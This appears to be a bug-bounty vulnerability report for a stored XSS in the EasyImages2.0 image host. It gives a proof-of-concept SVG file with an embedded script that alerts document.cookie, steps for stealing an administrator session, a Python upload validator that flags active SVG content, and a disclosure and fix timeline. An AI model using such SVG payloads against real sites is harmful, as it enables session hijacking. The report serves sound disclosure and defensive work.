Stored XSS vulnerability in the simple image host in icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023


Description

A stored XSS vulnerability exists in the simple image host. By constructing a malicious SVG file and directing the administrator to open it, the administrator's cookie is stolen.

Proof of Concept

Create the SVG file as follows:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

Administrator cookies can be stolen: no login is required to upload SVG files on the home page. The proof of stealing the administrator cookie is as follows:

1. Set up a local environment and log in as the administrator.
2. Upload the SVG XSS payload constructed above to the image host.
3. When the uploaded file is opened, the XSS cookie theft is triggered.
4. The cookie is obtained successfully.
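The root cause above is that the image host stores and serves any uploaded SVG verbatim, including the <script> element. The following is an added defensive example, not EasyImages2.0 code: an upload-time check that parses a user-supplied SVG as XML and rejects anything that can execute when the file is opened in a browser (script elements, on* event attributes, javascript: hrefs, foreignObject). The sample inputs are constructed here from the report's payload and a benign file.

```python
"""Reject uploaded SVG files that carry active content (added example)."""
import xml.etree.ElementTree as ET


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix from an element or attribute name."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected; empty means clean."""
    findings: list[str] = []
    try:
        root = ET.fromstring(data)  # external DTDs are not fetched by expat
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        # <script> runs directly; <foreignObject> can embed arbitrary HTML.
        if name in ("script", "foreignobject"):
            findings.append(f"active element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):
                findings.append(f"event handler attribute {aname} on <{name}>")
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in href on <{name}>")
    return findings


def is_safe_svg_upload(data: bytes) -> bool:
    """Upload-handler gate: store the file only when no finding is raised."""
    return not svg_findings(data)


# Constructed sample: the report's proof-of-concept payload.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">alert(document.cookie);</script>
</svg>"""

# Constructed sample: a plain drawing with no active content.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'

if __name__ == "__main__":
    print("PoC:", svg_findings(POC_SVG))       # ['active element <script>']
    print("benign safe:", is_safe_svg_upload(BENIGN_SVG))  # True
```

Serving stored SVGs with a restrictive Content-Security-Policy (for example one without script permissions) and X-Content-Type-Options: nosniff is a useful second layer in case a payload slips past the parser.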

Impact

Steal or tamper with application cookies for session hijacking

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. a year ago
We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back a year ago
NCNIPC梅苑 modified the report a year ago
icret validated this vulnerability a year ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

xulei1112 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
NCNIPC梅苑 (Researcher), a year ago:

This bug has been fixed in the new version https://github.com/icret/EasyImages2.0/commit/3434282bbb342966d9dfe256108f9f1d0eb97d34. Can I apply for a CVE number?

NCNIPC梅苑 (Researcher), a year ago:

@admin

icret marked this as fixed in 2.6.7 with commit 95a6ca a year ago
icret has been awarded the fix bounty
This vulnerability has now been published a year ago